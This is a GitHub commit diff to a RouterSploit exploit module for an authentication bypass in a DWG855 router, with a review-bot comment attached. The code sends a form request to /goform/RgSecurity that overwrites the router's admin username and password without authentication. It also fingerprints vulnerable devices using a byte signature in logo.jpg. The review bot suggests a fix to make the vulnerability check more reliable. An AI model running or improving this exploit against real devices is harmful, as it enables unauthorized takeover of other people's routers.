Commit ccfa2dcb by 0BuRner Committed by GitHub

Update dwg855_authbypass.py

parent 6e5c544d
import binascii
from routersploit import ( from routersploit import (
exploits, exploits,
print_success, print_success,
...@@ -34,14 +32,14 @@ class Exploit(exploits.Exploit): ...@@ -34,14 +32,14 @@ class Exploit(exploits.Exploit):
target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url) target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url)
port = exploits.Option(80, 'Target Port') port = exploits.Option(80, 'Target Port')
nuser = exploits.Option('ruser', 'Overwrite old user with.. ') nuser = exploits.Option('ruser', 'New user (overwrites existing user)')
npass = exploits.Option('rpass', 'Overwrite old password with.. ') npass = exploits.Option('rpass', 'New password (overwrites existing password)')
# The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself! # The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
vulnresp = binascii.unhexlify('114475636b7900') # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg" vulnresp = "\x11\x44\x75\x63\x6b\x79\x00" # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
def run(self): def run(self):
print_status("Changing " + self.target + " credentials to " + self.nuser + ":" + self.npass) print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port)) url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'} headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"} data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
...@@ -72,11 +70,7 @@ class Exploit(exploits.Exploit): ...@@ -72,11 +70,7 @@ class Exploit(exploits.Exploit):
response = http_request(method="GET", url=url, headers=headers) response = http_request(method="GET", url=url, headers=headers)
if response is None: if response is not None and self.vulnresp in response.text.encode('utf-8'):
return False # target is not vulnerable return True
elif self.vulnresp in response.text.encode('utf-8'):
return True # device is vulnerable
elif response.status_code == 401:
return False # target is not vulnerable
else: else:
return False # target is not vulnerable return False
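Review bot: The signature test in the second hunk, `self.vulnresp in response.text.encode('utf-8')`, matches a binary marker from logo.jpg against a body that has been decoded to text and re-encoded, so the result depends on the charset guessed for an image response and the check can report the wrong answer. Assuming http_request returns a requests-style response (inferred from `.text` and `.status_code`), compare raw bytes instead: `vulnresp = b"\x11\x44\x75\x63\x6b\x79\x00"` in the first hunk and `return response is not None and self.vulnresp in response.content` here, which also replaces the if/else that only returns a boolean. The new plain-str literal would additionally raise TypeError against the encoded bytes on Python 3. The enclosing method starts outside the hunk.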